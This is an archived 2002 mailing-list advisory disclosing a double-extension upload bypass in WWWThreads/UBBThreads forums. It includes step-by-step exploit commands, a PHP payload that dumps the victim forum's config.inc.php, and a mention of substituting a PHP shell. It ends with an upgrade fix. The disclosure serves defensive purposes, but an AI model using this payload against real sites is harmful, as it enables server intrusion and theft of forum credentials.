[ WWWThreads, UBBThreads ] Security Hole in upload system

From: Root Extractor (condorat_private)
Date: Wed Jan 30 2002 - 14:12:17 PST

  • Next message: rpc: "sastcpd 8.0 'authprog' local root vulnerability"

    
     ('binary' encoding is not supported, stored as-is)
    [ WWWThreads, UBBThreads ] Security Hole in 
    upload system
    
    Author: RootExtractor, CompuMe
    condorat_private, compume2000at_private
    
    I.   Details 
    II.  Vulnerable ver's
    III. Example, Xploit
    IV.  Solution
    
    Details :
    
    ..: config.inc.php :..
    ------------------------- snip ------------------------------
    
    // $config['excludefiles'] 
    = ".php,.asp,.js,.vbs,.sht,.htm";
       $config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";
    
    ------------------------- snip ------------------------------
    
     
    that files that were not listed in the allow files could 
    still be uploaded. Seems you checked the extension 
    but if someone added an allowable extension first 
    before the bogus extension the file would upload.
    
    vulnerable :
    WWWThreads and UBBThreads 5.5 Dev11 and piror
    
    not vulnerable : 
    UBBThreads 5.5
    
    Example : 
    you allow the upload or .txt,.jpg,.bmp,.zip 
    all files that don't have those extensions should not 
    be uploaded 
    However if somebody changes the name of the file to 
    blah.txt.php the file will validate and upload......huh !
    
    Xploit :
    1) make new file $ touch blah.txt.php
    2) edit it       $ vi blah.txt.php (in this step, write a php 
    code, for example)
    
    	            <?php
    	            	$readfile = join("", file
    ("../config.inc.php"));
    	          	print $readfile;
    	            ?>
    
    3) save & upload it
    4) visit your blah file, now you can to see a config file 
    of your victim forum
    5) i'm replaced readfile code by php shell file
    
    
    Solution :
    visit infopop.com and download ubbthreads 5.5
    http://www.infopop.com/
    
    
    Copyright 2002 recm security team
    http://hop.to/condor
    



    This archive was generated by hypermail 2b30 : Wed Jan 30 2002 - 15:02:07 PST